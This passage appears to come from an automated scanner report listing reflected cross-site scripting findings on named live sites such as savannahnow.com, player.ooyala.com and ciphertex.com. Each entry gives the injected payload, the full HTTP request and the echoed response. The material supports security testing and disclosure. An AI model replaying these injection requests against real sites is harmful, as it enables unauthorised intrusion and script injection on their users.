BF_PARTNER.gate_responsecf6f5<script>alert(1)</script>7bb596485ce(1304470645);

2.52. http://player.ooyala.com/player.js [autoplay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The value of the autoplay request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5fc32%3balert(1)//3209774be4c was submitted in the autoplay parameter. This input was echoed as 5fc32;alert(1)//3209774be4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player.js?autoplay=05fc32%3balert(1)//3209774be4c&width=900&deepLinkEmbedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr&height=506&embedCode=5wNDEwMjptj029cugN8F8Ne2kSHuLQdr HTTP/1.1
Host: player.ooyala.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 12 Sep 2011 13:02:06 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-9d79a4f1
X-Pad: avoid browser bug
Content-Length: 26501
Cache-Control: private, max-age=300
Date: Mon, 12 Sep 2011 13:02:06 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
NJl90x_Sxol5VyMQcXiGLsb0g2h6vnF5i0-T5Ft4xBOt5dq6lB95jeM5d5eZMMassZqCrj2-1YzQoYyyPKpBOsL7oivj3RtKy7";var S=window.location.href;if(S){if(G&&(G[G.length-1]!="&")){G+="&";}G+="docUrl="+escape(S);}var O="05fc32;alert(1)//3209774be4c";if(document.location.host.toLowerCase().indexOf("beboframe.com")>
...[SNIP]...

2.53. http://savannahnow.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4324a'-alert(1)-'2befc103ff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?4324a'-alert(1)-'2befc103ff4=1 HTTP/1.1
Host: savannahnow.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 12 Sep 2011 12:49:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 12:54:27 GMT
Last-Modified: Mon, 12 Sep 2011 12:49:26 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315831766"-gzip
Vary: Accept-Encoding
Content-Length: 149917
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
// MDW_Group
           s.prop17='Home' // MDW_Cat
           s.prop18='97010 Home' // MDW_Sub_Cat
           s.prop19=''
           s.prop20=''
s.prop21 = '' //NID
s.prop22 = '' //Author
s.prop23 = '?4324a'-alert(1)-'2befc103ff4=1' //Tax
s.prop24 = '' //Content type
s.campaign=s.getQueryParam('cid');

           /********* INSERT THE DOMAIN AND PATH TO YOUR CODE BELOW ************/

           var s_code=s.t();if(s_code)document.
...[SNIP]...

2.54. http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://savannahnow.com
Path:   /sites/all/modules/morris/yca_plugin/yahoo.cssca685

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ae60'-alert(1)-'04761a867b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites6ae60'-alert(1)-'04761a867b7/all/modules/morris/yca_plugin/yahoo.cssca685 HTTP/1.1
Host: savannahnow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cm.npc-morris.overture.com/js_1_0/?config=9472395290&type=home_page&ctxtId=home_page&source=npc_morris_savannahmorningnews_t2_ctxt&adwd=420&adht=150&ctxtUrl=http%3A//savannahnow.com/&css_url=http://savannahnow.com/sites/all/modules/morris/yca_plugin/yahoo.cssca685%22%3E%3Cscript%3Ealert(1)%3C/script%3E7a61d61a441&tg=1&bg=FFFFFF&bc=FFFFFF&refUrl=http%3A//drupal.org/cases&du=1&cb=1315849723547

Response

HTTP/1.0 404 Not Found
Date: Mon, 12 Sep 2011 13:00:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: MISS
Expires: Mon, 12 Sep 2011 13:05:48 GMT
Last-Modified: Mon, 12 Sep 2011 13:00:48 +0000
Cache-Control: must-revalidate, max-age=0, s-maxage=300
ETag: "1315832448"-gzip
Vary: Accept-Encoding
Content-Length: 79238
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sms8.morris.com
X-Cache-Lookup: MISS from sms8.morris.com:3128
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
up
           s.prop17='97040 Other' // MDW_Cat
           s.prop18='97040 Other' // MDW_Sub_Cat
           s.prop19=''
           s.prop20=''
s.prop21 = '' //NID
s.prop22 = '' //Author
s.prop23 = 'Sites6ae60'-alert(1)-'04761a867b7' //Tax
s.prop24 = '' //Content type
s.campaign=s.getQueryParam('cid');

           /********* INSERT THE DOMAIN AND PATH TO YOUR CODE BELOW ************/

           var s_code=s.t();if(s_code)document.wr
...[SNIP]...

2.55. http://video.fastcompany.com/companies/mansueto-digital/videos.rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://video.fastcompany.com
Path:   /companies/mansueto-digital/videos.rss

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 28b0a<script>alert(1)</script>3cd7c3816cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /companies28b0a<script>alert(1)</script>3cd7c3816cf/mansueto-digital/videos.rss?ids=35a3467f31b51,5a74966232a47,1bc51eb069eb1,29b58b01bf488,79b00a7ba65dd,273bd40607339&append_image_to_description=false&verbosity=low&p=fc_playlist_homepage&template_ids=rtmp_only%2Cflowplayer%2Cflowplayer_bwcheck&assets=dynamic_stream_switching_capable&append_image_to_description=false&still_frame_height=180 HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1603584230-1315849705375

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:49:11 GMT
Server: VoxCAST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Status: 404
X-Runtime: 15
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
Content-Length: 610
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<body>
<h1>File "/companies28b0a<script>alert(1)</script>3cd7c3816cf/mansueto-digital/videos.rss?ids=35a3467f31b51,5a74966232a47,1bc51eb069eb1,29b58b01bf488,79b00a7ba65dd,273bd40607339&append_image_to_description=false&verbosity=low&p=fc_playlist_homepage&template_ids=
...[SNIP]...

2.56. http://www.ciphertex.com/misc/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /misc/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27b58"><a>9130c261090 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /misc27b58"><a>9130c261090/favicon.ico HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:04 GMT
Vary: Accept-Encoding
Content-Length: 9999
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-misc27b58"><a>9130c261090-favicon.ico" class="section-misc27b58">
...[SNIP]...

2.57. http://www.ciphertex.com/modules/system/defaults.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/defaults.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99907"><a>10a7c8eef9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /99907"><a>10a7c8eef9e/system/defaults.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:35 GMT
Vary: Accept-Encoding
Content-Length: 10005
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-99907"><a>10a7c8eef9e-system-defaults.css" class="section-99907">
...[SNIP]...

2.58. http://www.ciphertex.com/modules/system/maintenance.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/maintenance.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58e7f"><a>be9fe9bf51d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /58e7f"><a>be9fe9bf51d/system/maintenance.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:26 GMT
Vary: Accept-Encoding
Content-Length: 10011
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-58e7f"><a>be9fe9bf51d-system-maintenance.css" class="section-58e7f">
...[SNIP]...

2.59. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d310"><a>4a350385199 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /9d310"><a>4a350385199/system/system-menus.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:32 GMT
Vary: Accept-Encoding
Content-Length: 10013
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-9d310"><a>4a350385199-system-system-menus.css" class="section-9d310">
...[SNIP]...

2.60. http://www.ciphertex.com/modules/system/system-menus.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system-menus.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78804"><a>580dc18678 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /modules/system78804"><a>580dc18678/system-menus.css?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:46:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:46:03 GMT
Vary: Accept-Encoding
Content-Length: 10011
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-modules-system78804"><a>580dc18678-system-menus.css" class="section-modules sidebar-none">
...[SNIP]...

2.61. http://www.ciphertex.com/modules/system/system.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /modules/system/system.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8557"><a>87f9da9af62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /modules/system/system.cssc8557"><a>87f9da9af62?0 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/products/view/cx-ranger-ex
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e; has_js=1; __utma=187742778.1111443639.1315849319.1315849319.1315849319.1; __utmb=187742778.2.10.1315849319; __utmc=187742778; __utmz=187742778.1315849319.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ciphertext%20data%20security

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:24 GMT
Vary: Accept-Encoding
Content-Length: 10001
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-modules-system-system.cssc8557"><a>87f9da9af62" class="section-modules sidebar-none">
...[SNIP]...

2.62. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77bd"><a>f6aa1bd3806 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/modules/b77bd"><a>f6aa1bd3806/fieldgroup.css?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:44:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:44:32 GMT
Vary: Accept-Encoding
Content-Length: 10039
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-modules-b77bd"><a>f6aa1bd3806-fieldgroup.css" class="section-sites sidebar-none">
...[SNIP]...

2.63. http://www.ciphertex.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/modules/fieldgroup/fieldgroup.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77d66"><a>596ac13dd54 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/modules/fieldgroup/77d66"><a>596ac13dd54?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:45:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:45:40 GMT
Vary: Accept-Encoding
Content-Length: 10031
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>
...[SNIP]...
<body id="page-sites-all-modules-cck-modules-fieldgroup-77d66"><a>596ac13dd54" class="section-sites sidebar-none">
...[SNIP]...

2.64. http://www.ciphertex.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ciphertex.com
Path:   /sites/all/modules/cck/theme/content-module.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee26c"><a>7338ae6f861 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sites/all/modules/cck/theme/content-module.cssee26c"><a>7338ae6f861?5 HTTP/1.1
Host: www.ciphertex.com
Proxy-Connection: keep-alive
Referer: http://www.ciphertex.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe7e1ce4917bcb7c6c1e7e1e807484f3c=73a26afbd88192a18065e392787c8e3e

Response

HTTP/1.1 404 Not Found
Date: Mon, 12 Sep 2011 12:42:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Mon, 12 Sep 2011 12:42:41 GMT
Vary: Accept-Encoding
Content-Length: 10041
